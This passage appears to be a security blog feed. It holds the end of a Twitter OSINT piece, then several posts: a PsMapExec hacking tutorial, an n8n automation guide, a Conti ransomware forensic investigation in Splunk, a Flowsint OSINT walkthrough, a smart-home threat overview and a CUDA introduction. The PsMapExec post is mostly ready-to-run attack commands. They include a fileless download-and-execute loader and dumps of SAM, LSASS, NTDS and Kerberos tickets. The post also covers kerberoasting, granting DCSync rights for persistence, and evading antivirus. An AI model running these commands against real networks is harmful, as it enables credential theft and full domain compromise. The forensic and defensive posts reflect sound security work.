Predictive Behavior Modeling: The most sophisticated investigators use historical pattern analysis to predict likely future behaviors and optimal monitoring strategies. Understanding individual behavioral patterns enables investigators to anticipate when targets are most likely to post valuable intelligence or engage in significant activities.

Modern Twitter OSINT now requires investigators to develop cross-platform correlation skills and collaborative intelligence gathering approaches. While the technical barriers have increased significantly, the platform remains valuable for those who understand how to leverage remaining accessible features through creative, systematic investigation techniques.

To improve your OSINT skills, check out our OSINT Investigator Bundle. You’ll explore both fundamental and advanced techniques and receive an OSINT Certified Investigator Voucher.

Powershell for Hackers, Part 9: Hacking with PsMapExec

24 November 2025 at 09:57

Welcome back, aspiring cyberwarriors!

During the past few months, we have been covering different ways to use PowerShell to survive, cause mayhem, and hack systems. We have also collected and created scripts for various purposes, stored in our repository for all of you to use. All these tools are extremely useful during pentests. As you know, with great power comes great responsibility. Today we will cover another tool that will significantly improve how you interact with systems. It’s called PsMapExec.

It was developed by The-Viper-One, inspired by CrackMapExec and its successor NetExec. Although PsMapExec doesn’t have identical capabilities to NetExec, it offers much greater stealth since it can be loaded directly into memory without ever touching the disk. Stealth remains one of the top priorities in hacking. Beyond that, the tool can execute commands even without knowing the password. It’s a big advantage when you gain access to a protected user during phishing or privilege escalation stages of a test.

The script has been around for a while but hasn’t gained much attention. That’s one of the reasons we decided to introduce it here. Like most publicly available offensive tools, it will get flagged by Defender if loaded directly. Skilled hackers often modify such scripts while keeping their core functionality intact, which helps them evade detection. Many offensive scripts rely on native Windows functions, and since those calls can’t be flagged, Microsoft and other vendors often rely on static keyword-based detection instead.

Finding a machine with no active antivirus isn’t always easy but is almost always possible. There are ways to bypass UAC, dump SAM hashes, modify the registry to allow pass-the-hash attacks, and then use a reverse proxy to connect via RDP. Once you have GUI access, your options widen. This approach isn’t the most stealthy, but it remains a reliable one.

Once Defender is disabled, you can move forward and test the script. Let’s explore some of its capabilities.

Loading in Memory

To avoid touching the disk and leaving unnecessary forensic traces, it’s best to execute the script directly in memory. You can do this with the following command:

PS > IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Once it’s loaded, we can proceed.

Dumping SAM Hashes

One of the first logical steps after gaining access to a host is dumping its hashes. SAM and LSASS attacks are among the most common ways to recover credentials. SAM gives you local user account hashes, while LSASS provides hashes of all connected users, including domain administrators and privileged accounts. In some organizations, critical users may belong to the Protected Users Group, which prevents their credentials from being cached in memory. While not a widespread practice, it’s something worth noting.

To dump local accounts from a single machine:

PS > PsMapExec smb -Targets MANAGER-1 -Module SAM -ShowOutput

To dump local accounts from all machines in a domain:

PS > PsMapExec smb -Targets all -Module SAM -ShowOutput

dumping sam with psmapexec

The output is clean and only includes valid local accounts.

Dumping LSASS Hashes

LSASS (Local Security Authority Subsystem Service) handles authentication on Windows systems. When you log in, your credentials are sent to the Domain Controller for validation, and if approved, you get a session token. Domain credentials are only stored temporarily on local machines. Even when a session is locked, credentials may still reside in memory.

To dump LSASS locally using an elevated shell:

PS > PsMapExec smb -Targets “localhost” -Module “LoginPasswords” -ShowOutput

If the current user doesn’t have permission, specify credentials manually:

PS > PsMapExec smb -Targets “DC” -Username “user” -Password “password” -Module “LoginPasswords” -ShowOutput

dumping lsass with psmapexec
dumping lsass with psmapexec

You can also perform this remotely with the same syntax.

Remote Command Execution

Every network is different. Some environments implement segmentation to prevent lateral movement, which adds complexity. The process of discovering the right hosts to pivot through is called pivoting.

To view network interfaces on all domain machines:

PS > PsMapExec SMB -Target all -Username “user” -Password “password” -Command “ipconfig” -Domain “sekvoya.local”

To query a single machine:

PS > PsMapExec SMB -Target “DC” -Username “user” -Password “password” -Command “ipconfig” -Domain “sekvoya.local”

executing commands remotely with psmapexec

You can execute other reconnaissance commands in the same way. After identifying valuable hosts, you may want to enable WINRM for stealthier interaction:

PS > PsMapExec SMB -Target “MANAGER-1” -Username “user” -Password “password” -Command “winrm quickconfig -q” -Domain “sekvoya.local”

Kerberos Tickets

Another valuable module PsMapExec provides is Kerbdump, which allows you to dump Kerberos tickets from remote memory. These tickets can be extracted for offline analysis or attacks such as Pass-the-Ticket. In Active Directory environments, Kerberos is responsible for issuing and validating these “passes” for authentication.

Some domains may disable NTLM for security reasons, which means you’ll rely on Kerberos. It’s a normal and frequent part of AD traffic, making it a subtle and effective method.

PS > PsMapExec -Method smb -Targets DC -Username “user” -Password “password” -Module “KerbDump” -ShowOutput

kerberoasing with psmapexec

The script parses the output automatically and gives you usable results.

Kerberoasting

Kerberoasting is a different kind of attack compared to simply dumping tickets. It focuses on obtaining Kerberos service tickets and brute-forcing them offline to recover plaintext credentials. The main idea is to assign an SPN to a target user and then extract their ticket.

Set an SPN for a user:

PS > PsMapExec ldap -Targets DC -Module AddSPN -TargetDN “CN=username,DC=SEKVOYA,DC=LOCAL”

Then kerberoast that user:

PS > PsMapExec kerberoast -Target “DC” -Username “user” -Password “password” -Option “kerberoast:adm_ivanov” -ShowOutput

kerbdump with psmapexec

This technique is effective for persistence and privilege escalation.

Ekeys

Kerberos tickets are encrypted using special encryption keys. Extracting these allows you to decrypt or even forge tickets, which can lead to deeper persistence and movement within the domain.

PS > PsMapExec wmi -Targets all -Module ekeys -ShowOutput

extracting ekeys with psmapexec
extracting ekeys with psmapexec

Targeting all machines in a big domain can create noise and compromise operational security.

Timeroasting

Another attack that targets Active Directory environments by exploiting how computers sync their clocks using the Network Time Protocol (NTP). In simple terms, it’s a way for hackers to trick a Domain Controller into revealing password hashes for computer accounts. These hashes can then be cracked offline to get the actual passwords, helping attackers move around the network or escalate privileges. Computer passwords are often long and random, but if they’re weak or reused, cracking succeeds. No alerts are triggered since it’s a normal time-sync query. The attack is hard to pull off, but it’s possible. When a new computer account is configured as a “pre-Windows 2000 computer”, its password is set based on its name. If the computer account name is MANAGER$ and it’s configured as “pre-Windows 2000 computer”, then the password will be lowercase computer name without the trailing $). When it isn’t configured like that, the password is randomly generated.

PS > PsMapExec ldap -Targets DC -Module timeroast -ShowOutput

timeroasting with psmapexec

Finding Files

Finding interesting or sensitive files on remote systems is an important phase in any engagement. PsMapExec’s Files module automatically enumerates non-default files within user directories.

PS > PsMapExec wmi -Targets all -Module Files -ShowOutput

finding interesting files with psmapexec

ACL Persistence

ACL persistence is a critical step after compromising an Active Directory domain. Credentials will rotate, hackers make mistakes that reveal their presence, and administrators will take measures to evict intruders. Implementing ACL-based persistence allows an attacker to maintain control over privileged groups or to perform DCSync attacks that extract directory data. For those unfamiliar, DCSync is an attack in which you impersonate a domain controller and request replication of the NTDS.dit data from a legitimate DC. Once obtained, the attacker acquires password hashes for all domain accounts, including the krbtgt account. Some recommend burning the domain down after a successful DCSync, because attackers will find ways to regain access.

You might think, “Okay, reset the KRBTGT password” Microsoft recommends doing this twice in quick succession. The first reset changes the hash for new tickets, and the second clears out the old history to fully invalidate everything. But that’s often not enough. Even after a reset, any Golden Tickets the attackers already forged remain usable until they expire. Default ticket lifetimes are 7-10 hours for sessions, but attackers can make them last up to 10 years! During this window, hackers can dig in deeper by creating hidden backdoor accounts, modifying group policies, or infecting other machines.

Assign DCSync privileges:

PS > PsMapExec ldap -Target DC -Module Elevate -TargetDN “CN=username,DC=SEKVOYA,DC=LOCAL”

dacl abuse and dacl persistence with psmapexec

NTDS Dump

The NTDS dump is the final stage once domain admin privileges are obtained. Extracting NTDS.dit and associated registry hives allows for offline cracking and full credential recovery.

PS > PsMapExec SMB -Targets “DC” -Username “user” -Password “password” -Module NTDS -ShowOutput

dumping ntds with psmapexec

This provides complete domain compromise capabilities and the ability to analyze or reuse credentials at will.

Summary

PsMapExec is a powerful framework that takes PowerShell-based network exploitation to a new level. It combines stealth and practicality, making it suitable for both red teamers and penetration testers who need to operate quietly within Windows domains. Its ability to run fully in memory minimizes traces, and its modules cover nearly every stage of network compromise, from reconnaissance and privilege escalation to persistence and data extraction. While we only explored some of its most impactful commands, PsMapExec offers far more under the hood. The more you experiment with it, the more its potential becomes evident.

Want to become a Powershell expert? Join our Powershell for Hackers training, March 10-12!

Automating Your Digital Life with n8n

21 November 2025 at 10:09

Welcome back, aspiring cyberwarriors!

As you know, there are plenty of automation tools out there, but most of them are closed-source, cloud-only services that charge you per operation and keep your data on their servers. For those of us who value privacy and transparency, these solutions simply won’t do. That’s where n8n comes into the picture – a free, private workflow automation platform that you can self-host on your own infrastructure while maintaining complete control over your data.

In this article, we explore n8n, set it up on a Raspberry Pi, and create a workflow for monitoring security news and sending it to Matrix. Let’s get rolling!

What is n8n?

n8n is a workflow automation platform that combines AI capabilities with business process automation, giving technical teams the flexibility of code with the speed of no-code. The platform uses a visual node-based interface where each node represents a specific action, for example, reading an RSS feed, sending a message, querying a database, or calling an API. When you connect these nodes, you create a workflow that executes automatically based on triggers you define.

With over 400 integrations, native AI capabilities, and a fair-code license, n8n lets you build powerful automation while maintaining full control over your data and deployments.

The Scenario: RSS Feed Monitoring with Matrix Notifications

For this tutorial, we’re going to build a practical workflow that many security professionals and tech enthusiasts need: automatically monitoring RSS feeds from security news sites and threat intelligence sources, then sending new articles directly to a Matrix chat room. Matrix is an open-source, decentralized communication protocol—essentially a privacy-focused alternative to Slack or Discord that you can self-host.

Step #1: Installing n8n on Raspberry Pi

Let’s get started by setting up n8n on your Raspberry Pi. First, we need to install Docker, which is the easiest way to run n8n on a Raspberry Pi. SSH into your Pi and run these commands:

pi> curl -fsSL https://get.docker.com -o get-docker.sh
pi> sudo sh get-docker.sh
pi> sudo usermod -aG docker pi

Log out and back in for the group changes to take effect. Now we can run n8n with Docker in a dedicated directory:

pi> sudo mkdir -p /opt/n8n/data


pi> sudo chown -R 1000:1000 /opt/n8n/data


pi> sudo docker run -d –restart unless-stopped –name n8n \
-p 5678:5678 \
-v ~/.n8n:/home/node/.n8n \
-e N8N_SECURE_COOKIE=false \
n8nio/n8n

This command runs n8n as a background service that automatically restarts if it crashes or when your Pi reboots. It maps port 5678 so you can access the n8n interface, and it creates a persistent volume at /opt/n8n/data to store your workflows and credentials so they survive container restarts. Also, the service doesn’t require an HTTPS connection; HTTP is enough.

Give it a minute to download and start, then open your web browser and navigate to http://your-raspberry-pi-ip:5678. You should see the n8n welcome screen asking you to create your first account.

Step #2: Understanding the n8n Interface

Once you’re logged in and have created your first workflow, you’ll see the n8n canvas—a blank workspace where you’ll build your workflows. The interface is intuitive, but let me walk you through the key elements.

On the right side, you’ll see a list of available nodes organized by category (Tab key). These are the building blocks of your workflows. There are trigger nodes that start your workflow (like RSS Feed Trigger, Webhook, or Schedule), action nodes that perform specific tasks (like HTTP Request or Function), and logic nodes that control flow (like IF conditions and Switch statements).

The main canvas in the center is where you’ll drag and drop nodes and connect them. Each connection represents data flowing from one node to the next. When a workflow executes, data passes through each node in sequence, getting transformed and processed along the way.

Step #3: Creating Your First Workflow – RSS to Matrix

Now let’s build our RSS monitoring workflow. Click the “Add workflow” button to create a new workflow. Give it a meaningful name like “Security RSS to Matrix”.

We’ll start by adding our trigger node. Click the plus icon on the canvas and search for “RSS Feed Trigger”. Select it and you’ll see the node configuration panel open on the right side.

In the RSS Feed Trigger node configuration, you need to specify the RSS feed URL you want to monitor. For this example, let’s use the Hackers-Arise feed.

The RSS Feed Trigger has several important settings. The Poll Times setting determines how often n8n checks the feed for new items. You can set it to check every hour, every day, or on a custom schedule. For a security news feed, checking every hour makes sense, so you get timely notifications without overwhelming your Matrix room.

Click “Execute Node” to test it. You should see the latest articles from the feed appear in the output panel. Each article contains data like title, link, publication date, and sometimes the author. This data will flow to the next nodes in your workflow.

Step #4: Configuring Matrix Integration

Now we need to add the Matrix node to send these articles to your Matrix room. Click the plus icon to add a new node and search for “Matrix”. Select the Matrix node and “Create a message” as the action.

Before we can use the Matrix node, we need to set up credentials. Click on “Credential to connect with” and select “Create New”. You’ll need to provide your Matrix homeserver URL, your Matrix username, and password or access token.

Now comes the interesting part—composing the message. n8n uses expressions to pull data from previous nodes. In the message field, you can reference data from the RSS Feed Trigger using expressions like {{ $json.title }} and {{ $json.link }}.

Here’s a good message template that formats the RSS articles nicely:

🔔 New Article: {{ $json.title }}

{{ $json.description }}

🔗 Read more: {{ $json.link }}

Step #5: Testing and Activating Your Workflow

Click the “Execute Workflow” button at the top. You should see the workflow execute, data flow through the nodes, and if everything is configured correctly, a message will appear in your Matrix room with the latest RSS article.

Once you’ve confirmed the workflow works correctly, activate it by clicking the toggle switch at the top of the workflow editor.

The workflow is now running automatically! The RSS Feed Trigger will check for new articles according to the schedule you configured, and each new article will be sent to your Matrix room.

Summary

The workflow we built today, monitoring RSS feeds and sending security news to Matrix, demonstrates n8n’s practical value. Whether you’re aggregating threat intelligence, monitoring your infrastructure, managing your home lab, or just staying on top of technology news, n8n can eliminate the tedious manual work that consumes so much of our time.

Digital Forensics: Investigating Conti Ransomware with Splunk

20 November 2025 at 10:58

Welcome back, aspiring digital forensic investigators!

The world of cybercrime continues to grow every year, and attackers constantly discover new opportunities and techniques to break into systems. One of the most dangerous and well-organized ransomware groups in recent years was Conti. Conti operated almost like a real company, with dedicated teams for developing malware, gaining network access, negotiating with victims, and even providing “customer support” for payments. The group targeted governments, hospitals, corporations, and many other high-value organizations. Their attacks included encrypting systems, stealing data, and demanding extremely high ransom payments.

For investigators, Conti became an important case study because their operations left behind a wide range of forensic evidence from custom malware samples to fast lateral movement and large-scale data theft. Even though the group officially shut down after their internal chats were leaked, many of their operators, tools, and techniques continued to appear in later attacks. This means Conti’s methods still influence modern ransomware operations which makes it a valid topic for forensic investigators.

Today, we are going to look at a ransomware incident involving Conti malware and analyze it with Splunk to understand how an Exchange server was compromised and what actions the attackers performed once inside.

Splunk

Splunk is a platform that collects and analyzes large amounts of machine data, such as logs from servers, applications, and security tools. It turns this raw information into searchable events, graphs, and alerts that help teams understand what is happening across their systems in real time. Companies mainly use Splunk for monitoring, security operations, and troubleshooting issues. Digital forensics teams also use Splunk because it can quickly pull together evidence from many sources and show patterns that would take much longer to find manually.

Time Filter

Splunk’s default time range is the last 24 hours. However, when investigating incidents, especially ransomware, you often need a much wider view. Changing the filter to “All time” helps reveal older activity that may be connected to the attack. Many ransomware operations begin weeks or even months before the final encryption stage. Keep in mind that searching all logs can be heavy on large environments, but in our case this wider view is necessary.

time filter on splunk

Index

An index in Splunk is like a storage folder where logs of a particular type are placed. For example, Windows Event Logs may go into one index, firewall logs into another, and antivirus logs into a third. When you specify an index in your search, you tell Splunk exactly where to look. But since we are investigating a ransomware incident, we want to search through every available index:

index=*

analyzing available fields on splunk

This ensures that nothing is missed and all logs across the environment are visible to us.

Fields

Fields are pieces of information extracted from each log entry, such as usernames, IP addresses, timestamps, file paths, and event IDs. They make your searches much more precise, allowing you to filter events with expressions like src_ip=10.0.0.5 or user=Administrator. In our case, we want to focus on executable files and that is the “Image”. If you don’t see it in the left pane, click “More fields” and add it.

adding more fields to splunk search

Once you’ve added it, click Image in the left pane to see the top 10 results. 

top 10 executed images

These results are definitely not enough to begin our analysis. We can expand the list using top

index=* | top limit=100 Image

top 100 results on images executed
suspicious binary found in splunk

Here the cmd.exe process running in the Administrator’s user folder looks very suspicious. This is unusual, so we should check it closely. We also see commands like net1, net, whoami, and rundll32.

recon commands found

In one of our articles, we learned that net1 works like net and can be used to avoid detection in PowerShell if the security rules only look for net.exe. The rundll32 command is often used to run DLL files and is commonly misused by attackers. It seems the attacker is using normal system tools to explore the system. It also might be that the hackers used rundll32 to stay in the system longer.

At this point, we can already say the attacker performed reconnaissance and could have used rundll32 for persistence or further execution.

Hashes

Next, let’s investigate the suspicious cmd.exe more closely. Its location alone is a red flag, but checking its hashes will confirm whether it is malicious.

index=* Image="C:\\Users\\Administrator\\Documents\\cmd.exe" | table Image, Hashes

getting image hashes in splunk

Copy one of the hashes and search for it on VirusTotal.

virus total results of the conti ransomware

The results confirm that this file belongs to a Conti ransomware sample. VirusTotal provides helpful behavior analysis and detection labels that support our findings. When investigating, give it a closer look to understand exactly what happened to your system.

Net1

Now let’s see what the attacker did using the net1 command:

index=* Image=*net1.exe

net1 found adding a new user to the remore destop users group

The logs show that a new user was added to the Remote Desktop Users local group. This allows the attacker to log in through RDP on that specific machine. Since this is a local group modification, it affects only that workstation.

In MITRE ATT&CK, this action falls under Persistence. The hackers made sure they could connect to the host even if other credentials were lost. Also, they may have wanted to log in via GUI to explore the system more comfortably.

TargetFilename

This field usually appears in file-related logs, especially Windows Security Logs, Sysmon events, or EDR data. It tells you the exact file path and file name that a process interacted with. This can include files being created, modified, deleted, or accessed. That means we can find files that malware interacted with. If you can’t find the TargetFilename field in the left pane, just add it.

Run:

index=* Image="C:\\Users\\Administrator\\Documents\\cmd.exe"

Then select TargetFilename

ransom notes found

We see that the ransomware created many “readme” files with a ransom note. This is common behavior for ransomware to spread notes everywhere. Encrypting data is the last step in attacks like this. We need to figure out how the attacker got into the system and gained high privileges.

Before we do that, let’s see how the ransomware was propagated across the domain:

index=* TargetFileName=*cmd.exe

wmi subscription propagated the ransomware

While unsecapp.exe is a legitimate Microsoft binary. When it appears, it usually means something triggered WMI activity, because Windows launches unsecapp.exe only when a program needs to receive asynchronous WMI callbacks. In our case the ransomware was spread using WMI and infected other hosts where the port was open. This is a very common approach. 

Sysmon Events

Sysmon Event ID 8 indicates a CreateRemoteThread event, meaning one process created a thread inside another. This is a strong sign of malicious activity because attackers use it for process injection, privilege escalation, or credential theft.

List these events:

index=* EventCode=8

event code 8 found

Expanding the log reveals another executable interacting with lsass.exe. This is extremely suspicious because lsass.exe stores credentials. Attacking LSASS is a common step for harvesting passwords or hashes.

found wmi subscription accessing lsass.exe to dump creds

Another instance of unsecapp.exe being used. It’s not normal to see it accessing lsass.exe. Our best guess here would be that something used WMI, and that WMI activity triggered code running inside unsecapp.exe that ended up touching LSASS. The goal behind it could be to dump LSASS every now and then until the domain admin credentials are found. If the domain admins are not in the Protected Users group, their credentials are stored in the memory of the machine they access. If that machine is compromised, the whole domain is compromised as well.

Exchange Server Compromise

Exchange servers are a popular target for attackers. Over the years, they have suffered from multiple critical vulnerabilities. They also hold high privileges in the domain, making them valuable entry points. In this case, the hackers used the ProxyShell vulnerability chain. The exploit abused the mailbox export function to write a malicious .aspx file (a web shell) to any folder that Exchange can access. Instead of a harmless mailbox export, Exchange unknowingly writes a web shell directly into the FrontEnd web directory. From there, the attacker can execute system commands, upload tools, and create accounts with high privileges.

To find the malicious .aspx file in our logs we should query this:

index=* source=*sysmon* *aspx

finding an aspx shell used for exchange compromise with proxyshell

We can clearly see that the web shell was placed where Exchange has web-accessible permissions. This webshell was the access point.

Timeline

The attack began when the intruder exploited the ProxyShell vulnerabilities on the Exchange server. By abusing the mailbox export feature, they forced Exchange to write a malicious .aspx web shell into a web-accessible directory. This web shell became their entry point and allowed them to run commands directly on the server with high privileges. After gaining access, the attacker carried out quiet reconnaissance using built-in tools such as cmd.exe, net1, whoami and rundll32. Using net1, the attacker added a new user to the Remote Desktop Users group to maintain persistence and guarantee a backup login method. The attacker then spread the ransomware across the network using WMI. The appearance of unsecapp.exe showed that WMI activity was being used to launch the malware on other hosts. Sysmon Event ID 8 logged remote thread creation where the system binary attempts to access lsass.exe. This suggests the attacker tried to dump credentials from memory. This activity points to a mix of WMI abuse and process injection aimed at obtaining higher privileges, especially domain-level credentials. 

Finally, once the attacker had moved laterally and prepared the environment, the ransomware (cmd.exe) encrypted systems and began creating ransom note files throughout these systems. This marked the last stage of the operation.

Summary

Ransomware is more than just a virus, it’s a carefully planned attack where attackers move through a network quietly before causing damage. In digital forensics we often face these attacks and investigating them means piecing together how it entered the system, what tools it used, which accounts it compromised, and how it spread. Logs, processes, file changes tell part of the story. By following these traces, we understand the attacker’s methods, see where defenses failed, and learn how to prevent future attacks. It’s like reconstructing a crime scene. Sometimes, we might be lucky enough to shut down their entire infrastructure before they can cause more damage.

If you need forensic assistance, you can hire our team to investigate and mitigate incidents. Additionally, we provide classes on digital forensics for those looking to expand their skills and understanding in this field. 

Open Source Intelligence (OSINT): Using Flowsint for Graph-Based Investigations

19 November 2025 at 10:54

Welcome back, aspiring cyberwarriors!

In our industry, we often find ourselves overwhelmed by data from numerous sources. You might be tracking threat actors across social media platforms, mapping domain infrastructure for a penetration test, investigating cryptocurrency transactions tied to ransomware operations, or simply trying to understand how different pieces of intelligence connect to reveal the bigger picture. The challenge is not finding data but making sense of it all. Traditional OSINT tools come and go, scripts break when APIs change, and your investigation notes end up scattered across spreadsheets, text files, and fragile Python scripts that stop working the moment a service updates its interface.

As you know, the real value in intelligence work is not in collecting isolated data points but in understanding the relationships between them. A domain by itself tells you little. But when you can see that a domain connected to an IP address, that IP is tied to an ASN owned by a specific organization, that organization is linked to social media accounts, and those accounts are associated with known threat actors, suddenly you have actionable intelligence. The problem is that most OSINT tools force you to work in silos. You run one tool to enumerate subdomains, another to check WHOIS records, and a third to search for breaches. Then, you manually try to piece it all together in your head or in a makeshift spreadsheet.

To solve these problems, we’re going to explore a tool called Flowsint – an open-source graph-based investigation platform. Let’s get rolling!

Step #1: Install Prerequisites

Before we can run Flowsint, we need to make certain we have the necessary prerequisites installed on our system. Flowsint uses Docker to containerize all its components. You will also need Make, a build automation tool that builds executable programs and libraries from source code.

In this tutorial, I will be installing Flowsint on my Raspberry Pi 4 system, but the instructions are nearly identical for use with other operating systems as long as you have Docker and Make installed.

First, make certain you have Docker installed.
kali> docker –version

Next, make sure you have Make installed.
kali > make –version

Now that we have our prerequisites in place, we are ready to download and install Flowsint.

Step #2: Clone the Flowsint Repository

Flowsint is hosted on GitHub as an open-source project. Clone the repository with the following command:
kali > git clone https://github.com/reconurge/flowsint.git
kali > cd flowsint

To install and start Flowsint in production mode, simply run:
kali > make prod

This command will do several things. It will build the Docker images for all the Flowsint components, start the necessary containers, including the Neo4j graph database, PostgreSQL database for user management, the FastAPI backend server, and the frontend application. It will also configure networking between the containers and set up the initial database schemas.

The first time you run this command, it may take several minutes to complete as Docker downloads base images and builds the Flowsint containers. You should see output in your terminal showing the progress of each build step. Once the installation completes, all the Flowsint services will be running in the background.

You can verify that the containers are running with:
kali > docker ps

Step #3: Create Your Account

With Flowsint now running, we can access the web interface and create our first user account. Open your web browser and navigate to: http://localhost:5173/register

Once you have filled in the registration form and logged in, you will now see the main interface, where you can begin building your investigations.

Step #4 Creating Your First Investigation

Let’s create a simple investigation to see how Flowsint works in practice.

After creating the investigation, we can view analytics about it and, most importantly, create our first sketch using the panel on the left. Sketches allow you to organize and visualize your data as a graph.

After creating the sketch, we need to add our first node to the ‘items’ section. In this case, let’s use a domain name.

Enter a domain name you want to investigate. For this tutorial, I will use a lenta.ru domain.

You should now see a node appear on the graph canvas representing your domain. Click on this node to select it and view the available transforms. You will see a list of operations you can perform on this domain entity.

Step #5 Running Transforms to Discover Relationships

Now that we have a domain entity in our graph, let’s run some transforms to discover related infrastructure and build out our investigation.

With your domain entity selected, look for the transform that will resolve the domain to its IP addresses. Flowsint will query DNS servers to find the IP addresses associated with your domain and create new IP entities in your graph connected to the domain with a relationship indicating the DNS resolution.

Let’s run another transform. Select your domain entity again, and this time run the WHOIS Lookup transform. This transform will query WHOIS databases to get domain registration information, including the registrar, registration date, expiration date, and sometimes contact information for the domain owner.

Now select one of the IP address entities that was discovered. You should see a different set of available transforms specific to IP addresses. Run the IP Information transform. This transform will get geolocation and network details for the IP address, including the country, city, ISP, and other relevant information.

Step #6 Chaining Transforms for Deeper Investigation

One of the powerful features of Flowsint is the ability to chain transforms together to automate complex investigation workflows. Instead of manually running each transform one at a time, you can set up sequences of transforms that execute automatically.

Let’s say you want to investigate not just a single domain but all the subdomains associated with it. Select your original domain entity and run the Domain to Subdomains transform. This transform will enumerate subdomains using various techniques, including DNS brute forcing, certificate transparency logs, and other sources.

Each discovered subdomain will appear as a new domain entity in your graph, connected to the parent domain.

Step #7 Investigating Social Media and Email Connections

Flowsint is not limited to technical infrastructure investigation. It also includes transforms for investigating individuals, organizations, social media accounts, and email addresses.

Let’s add an email address entity to our graph. In the sidebar, select the email entity type and enter an email address associated with your investigation target.

Once you have created the email entity, select it and look at the available transforms. You will see several options, including Email to Gravatar, Email to Breaches, and Email to Domains.

Summary

In many cases, cyberwarriors must make sense of vast amounts of interconnected data from diverse sources. A platform such as Flowsint provides the durable foundation we need to conduct comprehensive investigations that remain stable even as tools and data sources evolve around it.

Whether you are investigating threat actors, mapping infrastructure, tracking cryptocurrency flows, or uncovering human connections, Flowsint gives you the power to connect the dots and see the truth.

Smart Home Hacking: Getting Started

By: OTW
18 November 2025 at 13:25

Welcome back, my aspiring cyberwarriors!

As smart homes become ever more common in our digital world, they have become a favorite target for hackers around the world. We have seen SO many smart home devices compromised and then the hackers use those devices to pivot to other devices connected to the local area network such as phones and laptops.

Smart home devices now include so many devices, such as;

  1. Smart TV’s
  2. Smart Lighting
  3. Smart Garage Door Openers
  4. Smart Security Systems
  5. Smart Cameras
  6. Smart Appliances (Refrigerators, stoves, washers, dryers, etc.)
  7. Smart Picture Frames
  8. Smart Infotainment Systems
  9. and so many more

Each of these smart devices has a small CPU, small amount of RAM, and a Linux operating system, most commonly BusyBox, due to its very small size. These systems are very often shipped with little aforethought regarding security. This makes it relatively easy to hack these devices.

In addition, these devices are often connected to your Wi-Fi, Bluetooth, or Zigbee network. Each of these network types are vulnerable to multiple attack vectors making the entire home and the devices therein vulnerable.

To learn more about Smart Home Hacking, consider attending our Smart Home Hacking training, January 13-15.

Here are the most significant security risks documented in recent research and threat reports:

Common Smart Home Vulnerabilities

  • Weak or Default Credentials
    • Many smart home devices ship with weak, default, or hardcoded passwords, which attackers can easily guess or find online.
    • Credential stuffing and password reuse across multiple devices leads to widespread compromise.
  • Outdated and Unpatched Firmware
    • A high proportion of smart devices run old firmware with known vulnerabilities and rarely receive updates or security patches, leaving them open to exploitation.
    • Supply chain vulnerabilities can introduce malware before devices even reach the consumer (such as Badbox 2.0).
  • Vulnerable Network Services and Open Ports
    • Devices expose unnecessary or insecure services to the local network or internet (e.g., Telnet, UPnP, poorly secured web interfaces), facilitating remote exploitation.
    • Automated scanning for open ports is a dominant attack method, accounting for over 93% of blocked events in recent studies.
  • Poor Encryption and Data Protection
    • Many smart devices transmit sensitive data (e.g., audio, video, sensor readings) without proper encryption, enabling eavesdropping and privacy breaches.
    • Weak or flawed cryptographic implementations allow attackers to decrypt captured traffic or manipulate device functionality.
  • Device Hijacking and Botnets
    • Attackers can take over smart devices, using them as proxies for further attacks (DDoS, ad fraud, credential theft) or as part of large-scale botnets (Mirai, EchoBot, PUMABOT).
    • Compromised devices may serve attacks on other systems without user awareness—sometimes even posing physical safety risks (e.g., hijacked locks or thermostats).
  • Privacy and Data Exposure
    • Insecure cameras, microphones, and voice assistants can be used for covert surveillance or to steal sensitive data.
    • Exposed cloud APIs and device “phone home” features can leak data to third parties or attackers.
  • Weak Access Controls
    • Poor onboarding, lack of two-factor authentication, flawed pairing mechanisms, and weak authorization checks let attackers gain access to devices or sensitive controls.

Real-World Examples (2025)

  • Smart TVs, streaming devices, and IP cameras are currently the most exploited categories, often running on Linux/Android with outdated kernels.
  • Malicious firmware (such as BadBOX) pre-installed on consumer devices has led to huge botnets and residential proxy abuse, sometimes before devices are even plugged in by the end user.
  • Large-scale privacy violations include attackers publicly streaming home camera footage due to default credentials or unpatched vulnerabilities.

Summary Table

Vulnerability TypeExample Consequence
Default/weak credentialsEasy unauthorized access
Outdated firmwareExposure to known exploits
Open network servicesRemote code execution, botnets
Poor encryptionData interception, manipulation
Device hijacking/botnetsDDoS, fraud, lateral movement
Weak access controlsDevice takeover, privacy breaches
Privacy/data exposureSurveillance, data theft

Summary

Smart homes are becoming increasingly popular in industrialized countries particularly among higher income households. These smart homes offer the user convenience while offering an enticing target for hackers. If the attacker can compromise even one device within the home, then all of the devices on the home network are at risk!

To learn more about Smart Home Hacking and Security, consider attending our upcoming Smart Home Hacking training in January 2026.

What is NVIDIA’s CUDA and How is it Used in Cybersecurity?

By: OTW
17 November 2025 at 17:09

Welcome back my aspiring cyberwarriors!

You have likely heard of the company NVIDIA. Not only are the dominant company in computer graphics adapters (if you are gamer, you likely have one) and now, artificial intelligence. In recent weeks, they have become the most valuable company in the world ($5 trillion).

The two primary reasons that Nvidia has become so important to artificial intelligence are:

  1. Nvidia chips can process data in multiple threads, in some cases, thousands of threads. This makes doing complex calculations in parallel possible, making them much faster.
  2. Nvidia created a development environment named CUDA for harnessing the power of these powerful CPU’s. This development environment is a favorite among artificial intelligence, data analytics, and cybersecurity professionals.

Let’s a brief moment to examine this powerful environment.

What is CUDA?

Most computers have two main processors:

CPU (Central Processing Unit): General-purpose, executes instructions sequentially or on a small number of cores. These CPU’s such as Intel and AMD provide the flexibility to run many different applications on your computer.

GPU (Graphics Processing Unit): These GPU’s were originally designed to draw graphics for applications such as games and VR environments. These GPU’s contain hundreds or thousands of small cores that excel at doing the same thing many times in parallel.

CUDA (Compute Unified Device Architecture) is NVIDIA’s framework that lets you take control of the GPU for general computing tasks. In other words, CUDA lets you write code that doesn’t just render graphics—it crunches numbers at massive scale. That’s why it’s a favorite for machine learning, password cracking, and scientific computing.

Why Should Hackers & Developers Care?

CUDA matters as an important tool in your cybersecurity toolkit because:

Speed: A GPU can run password hashes or machine learning models orders of magnitude faster than a CPU.

Parallelism: If you need to test millions of combinations, analyze huge datasets, or simulate workloads, CUDA gives you raw power.

Applications in Hacking: Tools like Hashcat and Pyrit use CUDA to massively accelerate brute-force and dictionary attacks. Security researchers who understand CUDA can customize or write their own GPU-accelerated tools.

The CUDA environment sees the GPU as a device with:

Threads: The smallest execution unit (like a tiny worker).

Blocks: Groups of threads.

Grids: Groups of blocks.

Think of it like this:

  • A CPU worker can cook one meal at a time.
